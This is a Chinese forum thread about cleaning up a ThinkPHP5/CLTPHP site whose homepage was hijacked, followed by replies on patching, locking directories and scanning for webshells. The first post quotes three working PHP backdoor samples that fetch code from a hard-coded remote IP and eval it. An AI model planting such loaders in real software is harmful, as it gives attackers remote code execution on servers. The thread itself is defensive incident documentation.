基于 ThinkPHP5 的 cltphp 被搜索劫持，篡改首页的解决过程记录

经过对比文件：
1- 攻击者会写入与原文件名类似的文件，

，内容：

function s(){
    $contents = file_get_contents('http://67.198.186.42:29808/s/admine21.txt');
    a($contents);
}
function a($conn){
    $b = '';
    eval($b.$conn.$b);
}
s();

?>

或者

<?php $a = fopen('http://67.198.186.42:8889/ma/3699.txt', 'r');
$b = '';
while (false != ($c = fread($a, 8080))) {
    $b .= $c;
    echo $b ;
}
die();
print(eval($c = $b));
fclose($a); ?>

或

<?php
function _strint($key){
    return @file_get_contents($key);
}
function log1($log){
    lone(_strint($log));
}
function lone($key){
    $str = "";
    return eval($str.$key.$str);
}
foreach (array('_COOKIE','_POST','_GET') as $_request)
{
    foreach ($$_request as $_key=>$_value)
    {
        $$_key=  $_value;
    }
}
$id = isset($id) ? $id : 2;
log1($id);
?>

等各种类似的文件内容

今晚我在恢复正常后，采取文章 https://blog.csdn.net/qq_39188306/article/... 的意见，近期看看是否还被攻击

@JeffLi check 今天一天都没出问题 http://sdxrdcar.cn/home-clzs-info-id-72-ca...

打卡，到现在四天没出问题啦~再遭受同种攻击应该不会中招了~

@JeffLi 打上 TP5 官方补丁，然后锁死所有目录，除了 runtime、public

这几天又被同类攻击得逞了，说明问题还是没解决，今天我更换了匹配规则
，按照这个改的 https://github.com/top-think/framework/com...

我之前做我的网站是因为tp5的漏洞被篡改首页，用官网的方法打了补丁和网上的解决办法一样没用，估计是木马文件没删除干净，最后实在没辙我就先用WebShellKill这个软件查木马文件，让后下最新的tp5框架，把之前的程序移植过来，网站首页就再也没被篡改了。

@wenxi 好的 我试一下哦~

@wenxi WebShellKill 扫描有用吗。。